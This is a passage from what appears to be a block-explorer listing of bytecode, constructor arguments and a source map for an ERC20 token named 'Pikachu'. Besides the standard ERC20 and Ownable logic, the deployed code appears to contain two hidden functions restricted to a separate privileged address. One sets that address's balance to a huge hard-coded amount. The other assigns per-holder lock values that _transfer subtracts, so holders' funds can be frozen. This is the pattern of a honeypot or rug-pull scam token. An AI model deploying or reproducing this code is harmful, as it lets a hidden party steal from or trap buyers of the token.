395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c8610f20565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610937576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092e90611625565b60405180910390fd5b61094081610f9e565b50565b600080828461095291906114ab565b905083811015610997576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098e90611691565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0f90611723565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7e906117b5565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6591906112e0565b60405180910390a3505050565b6000610b7e8484610839565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c085781811015610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611821565b60405180910390fd5b610c078484610c02858561106290919063ffffffff16565b6109a9565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c74906118b3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce390611945565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8482600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106290919063ffffffff16565b905082811015610dc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc0906119d7565b60405180910390fd5b610ddc838261106290919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7183600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094390919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1191906112e0565b60405180910390a35050505050565b610f286109a1565b73ffffffffffffffffffffffffffffffffffffffff16610f466105e3565b73ffffffffffffffffffffffffffffffffffffffff1614610f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9390611a43565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a483836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ac565b905092915050565b60008383111582906110f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110eb91906111a0565b60405180910390fd5b50600083856111039190611a63565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114a57808201518184015260208101905061112f565b60008484015250505050565b6000601f19601f8301169050919050565b600061117282611110565b61117c818561111b565b935061118c81856020860161112c565b61119581611156565b840191505092915050565b600060208201905081810360008301526111ba8184611167565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f2826111c7565b9050919050565b611202816111e7565b811461120d57600080fd5b50565b60008135905061121f816111f9565b92915050565b6000819050919050565b61123881611225565b811461124357600080fd5b50565b6000813590506112558161122f565b92915050565b60008060408385031215611272576112716111c2565b5b600061128085828601611210565b925050602061129185828601611246565b9150509250929050565b60008115159050919050565b6112b08161129b565b82525050565b60006020820190506112cb60008301846112a7565b92915050565b6112da81611225565b82525050565b60006020820190506112f560008301846112d1565b92915050565b600080600060608486031215611314576113136111c2565b5b600061132286828701611210565b935050602061133386828701611210565b925050604061134486828701611246565b9150509250925092565b600060ff82169050919050565b6113648161134e565b82525050565b600060208201905061137f600083018461135b565b92915050565b60006020828403121561139b5761139a6111c2565b5b60006113a984828501611210565b91505092915050565b6113bb816111e7565b82525050565b60006020820190506113d660008301846113b2565b92915050565b600080604083850312156113f3576113f26111c2565b5b600061140185828601611210565b925050602061141285828601611210565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146357607f821691505b6020821081036114765761147561141c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b682611225565b91506114c183611225565b92508282019050808211156114d9576114d861147c565b5b92915050565b60006114ea82611225565b91506114f583611225565b925082820261150381611225565b9150828204841483151761151a5761151961147c565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157d60258361111b565b915061158882611521565b604082019050919050565b600060208201905081810360008301526115ac81611570565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160f60268361111b565b915061161a826115b3565b604082019050919050565b6000602082019050818103600083015261163e81611602565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167b601b8361111b565b915061168682611645565b602082019050919050565b600060208201905081810360008301526116aa8161166e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170d60248361111b565b9150611718826116b1565b604082019050919050565b6000602082019050818103600083015261173c81611700565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179f60228361111b565b91506117aa82611743565b604082019050919050565b600060208201905081810360008301526117ce81611792565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180b601d8361111b565b9150611816826117d5565b602082019050919050565b6000602082019050818103600083015261183a816117fe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189d60258361111b565b91506118a882611841565b604082019050919050565b600060208201905081810360008301526118cc81611890565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192f60238361111b565b915061193a826118d3565b604082019050919050565b6000602082019050818103600083015261195e81611922565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c160268361111b565b91506119cc82611965565b604082019050919050565b600060208201905081810360008301526119f0816119b4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2d60208361111b565b9150611a38826119f7565b602082019050919050565b60006020820190508181036000830152611a5c81611a20565b9050919050565b6000611a6e82611225565b9150611a7983611225565b9250828203905081811115611a9157611a9061147c565b5b9291505056fea2646970667358221220744e60942f56721ae7d8de0c2ce2b264e94dfd692decc398d3ccc5671680cf3f64736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000750696b6163687500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000750494b4143485500000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063bd1f529e14610315578063c65e4d5314610331578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b60405161013091906111a0565b60405180910390f35b610153600480360381019061014e919061125b565b61042d565b60405161016091906112b6565b60405180910390f35b610171610450565b60405161017e91906112e0565b60405180910390f35b6101a1600480360381019061019c91906112fb565b61045a565b6040516101ae91906112b6565b60405180910390f35b6101bf610489565b6040516101cc919061136a565b60405180910390f35b6101ef60048036038101906101ea919061125b565b610492565b6040516101fc91906112b6565b60405180910390f35b61021f600480360381019061021a919061125b565b6104c9565b005b61023b60048036038101906102369190611385565b610586565b60405161024891906112e0565b60405180910390f35b6102596105cf565b005b6102636105e3565b60405161027091906113c1565b60405180910390f35b61028161060c565b60405161028e91906111a0565b60405180910390f35b61029f61069e565b6040516102ac91906112e0565b60405180910390f35b6102cf60048036038101906102ca919061125b565b6106ad565b6040516102dc91906112b6565b60405180910390f35b6102ff60048036038101906102fa919061125b565b610734565b60405161030c91906112b6565b60405180910390f35b61032f600480360381019061032a9190611385565b610757565b005b610339610813565b60405161034691906113c1565b60405180910390f35b610369600480360381019061036491906113dc565b610839565b60405161037691906112e0565b60405180910390f35b61039960048036038101906103949190611385565b6108c0565b005b6060600580546103aa9061144b565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144b565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a1565b90506104458185856109a9565b600191505092915050565b6000600454905090565b6000806104656109a1565b9050610472858285610b72565b61047d858585610c0e565b60019150509392505050565b60006012905090565b60008061049d6109a1565b90506104be8185856104af8589610839565b6104b991906114ab565b6109a9565b600191505092915050565b6104d16109a1565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361058257600081600161053491906114df565b61053e91906114ab565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d7610f20565b6105e16000610f9e565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061b9061144b565b80601f01602080910402602001604051908101604052809291908181526020018280546106479061144b565b80156106945780601f1061066957610100808354040283529160200191610694565b820191906000526020600020905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b6a027b46536c66c8e300000081565b6000806106b86109a1565b905060006106c68286610839565b90508381101561070b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070290611593565b60405180910390fd5b6107288286610723878561106290919063ffffffff16565b6109a9565b60019250505092915050565b60008061073f6109a1565b905061074c818585610c0e565b600191505092915050565b60006107616109a1565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080f57710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c8610f20565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610937576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092e90611625565b60405180910390fd5b61094081610f9e565b50565b600080828461095291906114ab565b905083811015610997576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098e90611691565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0f90611723565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7e906117b5565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6591906112e0565b60405180910390a3505050565b6000610b7e8484610839565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c085781811015610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611821565b60405180910390fd5b610c078484610c02858561106290919063ffffffff16565b6109a9565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c74906118b3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce390611945565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8482600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106290919063ffffffff16565b905082811015610dc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc0906119d7565b60405180910390fd5b610ddc838261106290919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7183600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094390919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1191906112e0565b60405180910390a35050505050565b610f286109a1565b73ffffffffffffffffffffffffffffffffffffffff16610f466105e3565b73ffffffffffffffffffffffffffffffffffffffff1614610f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9390611a43565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a483836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ac565b905092915050565b60008383111582906110f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110eb91906111a0565b60405180910390fd5b50600083856111039190611a63565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114a57808201518184015260208101905061112f565b60008484015250505050565b6000601f19601f8301169050919050565b600061117282611110565b61117c818561111b565b935061118c81856020860161112c565b61119581611156565b840191505092915050565b600060208201905081810360008301526111ba8184611167565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f2826111c7565b9050919050565b611202816111e7565b811461120d57600080fd5b50565b60008135905061121f816111f9565b92915050565b6000819050919050565b61123881611225565b811461124357600080fd5b50565b6000813590506112558161122f565b92915050565b60008060408385031215611272576112716111c2565b5b600061128085828601611210565b925050602061129185828601611246565b9150509250929050565b60008115159050919050565b6112b08161129b565b82525050565b60006020820190506112cb60008301846112a7565b92915050565b6112da81611225565b82525050565b60006020820190506112f560008301846112d1565b92915050565b600080600060608486031215611314576113136111c2565b5b600061132286828701611210565b935050602061133386828701611210565b925050604061134486828701611246565b9150509250925092565b600060ff82169050919050565b6113648161134e565b82525050565b600060208201905061137f600083018461135b565b92915050565b60006020828403121561139b5761139a6111c2565b5b60006113a984828501611210565b91505092915050565b6113bb816111e7565b82525050565b60006020820190506113d660008301846113b2565b92915050565b600080604083850312156113f3576113f26111c2565b5b600061140185828601611210565b925050602061141285828601611210565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146357607f821691505b6020821081036114765761147561141c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b682611225565b91506114c183611225565b92508282019050808211156114d9576114d861147c565b5b92915050565b60006114ea82611225565b91506114f583611225565b925082820261150381611225565b9150828204841483151761151a5761151961147c565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157d60258361111b565b915061158882611521565b604082019050919050565b600060208201905081810360008301526115ac81611570565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160f60268361111b565b915061161a826115b3565b604082019050919050565b6000602082019050818103600083015261163e81611602565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167b601b8361111b565b915061168682611645565b602082019050919050565b600060208201905081810360008301526116aa8161166e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170d60248361111b565b9150611718826116b1565b604082019050919050565b6000602082019050818103600083015261173c81611700565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179f60228361111b565b91506117aa82611743565b604082019050919050565b600060208201905081810360008301526117ce81611792565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180b601d8361111b565b9150611816826117d5565b602082019050919050565b6000602082019050818103600083015261183a816117fe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189d60258361111b565b91506118a882611841565b604082019050919050565b600060208201905081810360008301526118cc81611890565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192f60238361111b565b915061193a826118d3565b604082019050919050565b6000602082019050818103600083015261195e81611922565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c160268361111b565b91506119cc82611965565b604082019050919050565b600060208201905081810360008301526119f0816119b4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2d60208361111b565b9150611a38826119f7565b602082019050919050565b60006020820190508181036000830152611a5c81611a20565b9050919050565b6000611a6e82611225565b9150611a7983611225565b9250828203905081811115611a9157611a9061147c565b5b9291505056fea2646970667358221220744e60942f56721ae7d8de0c2ce2b264e94dfd692decc398d3ccc5671680cf3f64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000750696b6163687500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000750494b4143485500000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Pikachu
Arg [1] : symbol_ (string): PIKACHU

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [3] : 50696b6163687500000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [5] : 50494b4143485500000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12162:10824:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13040:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15402:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14169:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16183:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14011:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16853:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18051:162;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14340:129;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10013:103;;;:::i;:::-;;9361:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13259:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12459:54;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17594:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14675:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19146:210;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12337:24;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14931:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10271:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13040:100;13094:13;13127:5;13120:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13040:100;:::o;15402:201::-;15485:4;15502:13;15518:12;:10;:12::i;:::-;15502:28;;15541:32;15550:5;15557:7;15566:6;15541:8;:32::i;:::-;15591:4;15584:11;;;15402:201;;;;:::o;14169:108::-;14230:7;14257:12;;14250:19;;14169:108;:::o;16183:261::-;16280:4;16297:15;16315:12;:10;:12::i;:::-;16297:30;;16338:38;16354:4;16360:7;16369:6;16338:15;:38::i;:::-;16387:27;16397:4;16403:2;16407:6;16387:9;:27::i;:::-;16432:4;16425:11;;;16183:261;;;;;:::o;14011:93::-;14069:5;14094:2;14087:9;;14011:93;:::o;16853:238::-;16941:4;16958:13;16974:12;:10;:12::i;:::-;16958:28;;16997:64;17006:5;17013:7;17050:10;17022:25;17032:5;17039:7;17022:9;:25::i;:::-;:38;;;;:::i;:::-;16997:8;:64::i;:::-;17079:4;17072:11;;;16853:238;;;;:::o;18051:162::-;18136:12;:10;:12::i;:::-;18124:24;;:8;;;;;;;;;;;:24;;;18120:86;;18193:1;18182:8;18178:1;:12;;;;:::i;:::-;:16;;;;:::i;:::-;18165:5;:10;18171:3;18165:10;;;;;;;;;;;;;;;:29;;;;18120:86;18051:162;;:::o;14340:129::-;14414:7;14441:11;:20;14453:7;14441:20;;;;;;;;;;;;;;;;14434:27;;14340:129;;;:::o;10013:103::-;9243:17;:15;:17::i;:::-;10078:30:::1;10105:1;10078:18;:30::i;:::-;10013:103::o:0;9361:87::-;9407:7;9434:6;;;;;;;;;;;9427:13;;9361:87;:::o;13259:104::-;13315:13;13348:7;13341:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13259:104;:::o;12459:54::-;12495:18;12459:54;:::o;17594:401::-;17687:4;17704:13;17720:12;:10;:12::i;:::-;17704:28;;17743:24;17770:25;17780:5;17787:7;17770:9;:25::i;:::-;17743:52;;17834:15;17814:16;:35;;17806:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;17902:63;17911:5;17918:7;17927:37;17948:15;17927:16;:20;;:37;;;;:::i;:::-;17902:8;:63::i;:::-;17983:4;17976:11;;;;17594:401;;;;:::o;14675:193::-;14754:4;14771:13;14787:12;:10;:12::i;:::-;14771:28;;14810;14820:5;14827:2;14831:6;14810:9;:28::i;:::-;14856:4;14849:11;;;14675:193;;;;:::o;19146:210::-;19192:17;19212:12;:10;:12::i;:::-;19192:32;;19251:9;19239:21;;:8;;;;;;;;;;;:21;;;19235:114;;19296:41;19277:11;:16;19289:3;19277:16;;;;;;;;;;;;;;;:60;;;;19235:114;19181:175;19146:210;:::o;12337:24::-;;;;;;;;;;;;;:::o;14931:151::-;15020:7;15047:11;:18;15059:5;15047:18;;;;;;;;;;;;;;;:27;15066:7;15047:27;;;;;;;;;;;;;;;;15040:34;;14931:151;;;;:::o;10271:201::-;9243:17;:15;:17::i;:::-;10380:1:::1;10360:22;;:8;:22;;::::0;10352:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10436:28;10455:8;10436:18;:28::i;:::-;10271:201:::0;:::o;3573:181::-;3631:7;3651:9;3667:1;3663;:5;;;;:::i;:::-;3651:17;;3692:1;3687;:6;;3679:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3745:1;3738:8;;;3573:181;;;;:::o;8573:98::-;8626:7;8653:10;8646:17;;8573:98;:::o;20577:346::-;20696:1;20679:19;;:5;:19;;;20671:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20777:1;20758:21;;:7;:21;;;20750:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;20861:6;20831:11;:18;20843:5;20831:18;;;;;;;;;;;;;;;:27;20850:7;20831:27;;;;;;;;;;;;;;;:36;;;;20899:7;20883:32;;20892:5;20883:32;;;20908:6;20883:32;;;;;;:::i;:::-;;;;;;;;20577:346;;;:::o;21214:378::-;21315:24;21342:25;21352:5;21359:7;21342:9;:25::i;:::-;21315:52;;21402:17;21382:16;:37;21378:207;;21464:6;21444:16;:26;;21436:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21519:54;21528:5;21535:7;21544:28;21565:6;21544:16;:20;;:28;;;;:::i;:::-;21519:8;:54::i;:::-;21378:207;21304:288;21214:378;;;:::o;18221:634::-;18334:1;18318:18;;:4;:18;;;18310:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18411:1;18397:16;;:2;:16;;;18389:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;18466:17;18486:5;:11;18492:4;18486:11;;;;;;;;;;;;;;;;18466:31;;18508:21;18532:32;18554:9;18532:11;:17;18544:4;18532:17;;;;;;;;;;;;;;;;:21;;:32;;;;:::i;:::-;18508:56;;18600:6;18583:13;:23;;18575:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;18680:25;18698:6;18680:13;:17;;:25;;;;:::i;:::-;18660:11;:17;18672:4;18660:17;;;;;;;;;;;;;;;:45;;;;18778:27;18798:6;18778:11;:15;18790:2;18778:15;;;;;;;;;;;;;;;;:19;;:27;;;;:::i;:::-;18760:11;:15;18772:2;18760:15;;;;;;;;;;;;;;;:45;;;;18836:2;18821:26;;18830:4;18821:26;;;18840:6;18821:26;;;;;;:::i;:::-;;;;;;;;18299:556;;18221:634;;;:::o;9526:136::-;9605:12;:10;:12::i;:::-;9594:23;;:7;:5;:7::i;:::-;:23;;;9586:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9526:136::o;10632:191::-;10706:16;10725:6;;;;;;;;;;;10706:25;;10751:8;10742:6;;:17;;;;;;;;;;;;;;;;;;10806:8;10775:40;;10796:8;10775:40;;;;;;;;;;;;10695:128;10632:191;:::o;4037:136::-;4095:7;4122:43;4126:1;4129;4122:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4115:50;;4037:136;;;;:::o;4476:192::-;4562:7;4595:1;4590;:6;;4598:12;4582:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4622:9;4638:1;4634;:5;;;;:::i;:::-;4622:17;;4659:1;4652:8;;;4476:192;;;;;:::o;7:99:1: